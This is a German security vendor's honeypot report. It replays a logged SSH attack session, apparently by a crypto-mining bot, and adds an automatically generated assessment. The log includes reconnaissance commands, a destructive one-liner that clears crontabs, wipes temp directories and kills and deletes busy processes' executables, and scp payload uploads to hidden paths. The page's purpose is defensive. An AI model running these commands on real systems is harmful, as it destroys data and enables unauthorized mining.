ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

08.10.2026, 05:09 UTC · 64 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
remote / Password

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
remote@srv01: ~

remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ uname -m | awk '{printf $1}'
x86_64
remote@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
391 days, 00:00
remote@srv01:~$ lspci | egrep VGA && lspci | grep 3D
00:02.0 VGA compatible controller: Intel Corporation Atom/Celeron/Pentium Processor x5-E8000/J3xxx/N3xxx Integrated Graphics Controller (rev 21)
remote@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Celeron(R) CPU J1900 @ 1.99GHz
remote@srv01:~$ curl ipinfo.io/org
AS60751
remote@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
remote@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
remote@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
remote@srv01:~$ uname -n | awk '{printf $1}'
nas
remote@srv01:~$ uname -r | awk '{printf $1}'
4.19.0-25-amd64
remote@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: cache: command not found
remote@srv01:~$ echo Password > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/tstuRJiQ"
remote@srv01:~$ scp -qt "/tmp/tstuRJiQ"
remote@srv01:~$ scp -qt "/dev/shm/tstuRJiQ"
remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ echo webuser > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/GqzrFFUA"
remote@srv01:~$ scp -qt "/tmp/GqzrFFUA"
remote@srv01:~$ scp -qt "/dev/shm/GqzrFFUA"
remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ echo actian > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/Offzqaqk"
remote@srv01:~$ scp -qt "/tmp/Offzqaqk"
remote@srv01:~$ scp -qt "/dev/shm/Offzqaqk"
remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ echo changeme > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/JXnnfZln"
remote@srv01:~$ scp -qt "/tmp/JXnnfZln"
remote@srv01:~$ scp -qt "/dev/shm/JXnnfZln"
remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ echo support > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/rapyIRol"
remote@srv01:~$ scp -qt "/tmp/rapyIRol"
remote@srv01:~$ scp -qt "/dev/shm/rapyIRol"
remote@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
remote@srv01:~$ echo 000000 > /tmp/d.log
remote@srv01:~$ scp -qt "/var/tmp/SBIDMVOO"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer verbindet sich über SSH mit schwachen Zugangsdaten und führt zunächst eine detaillierte Systemerkennung durch. Dabei prüft er die Hardware, insbesondere auf vorhandene Grafikkarten, und löscht anschließend aggressive temporäre Dateien sowie Prozesse mit hoher CPU- oder RAM-Nutzung. Im weiteren Verlauf versucht er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren, wobei er die Logdatei mehrfach mit unterschiedlichen Benutzernamen überschreibt.

Was die Befehle bewirken

Die Befehle uname, lspci und lscpu sammeln Informationen über das Betriebssystem, die Grafikkarten und den Prozessor. Die Abfrage von nvidia-smi prüft auf NVIDIA-GPUs, die für Mining besonders geeignet sind. Der komplexe Befehl mit crontab und ps entfernt alte Aufgaben, leert temporäre Ordner und beendet Prozesse, die mehr als 40 Prozent CPU oder 60 Prozent RAM verbrauchen, um Platz zu schaffen. Die scp-Befehle versuchen, Dateien in versteckte Ordner wie /var/tmp oder /dev/shm zu übertragen, was auf das Hochladen einer Malware hindeutet.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Vorbereitung für Kryptomining hin, da die Abfrage nach NVIDIA- und Radeon-Grafikkarten typisch für Miner-Installer ist. Das Löschen konkurrierender Prozesse dient dazu, die Systemressourcen für den eigenen Miner freizumachen. Da die eigentliche Payload nicht vollständig sichtbar ist, bleibt das finale Ziel etwas unklar, aber die Infrastruktur-Vorbereitung ist eindeutig.

Einordnung

Dieses Muster ist sehr verbreitet bei automatisierten Bots, die nach schwachen SSH-Zugängen suchen. Die Kombination aus Hardware-Scan und Ressourcenbereinigung ist ein Standardvorgehen für Kryptomining-Botnets.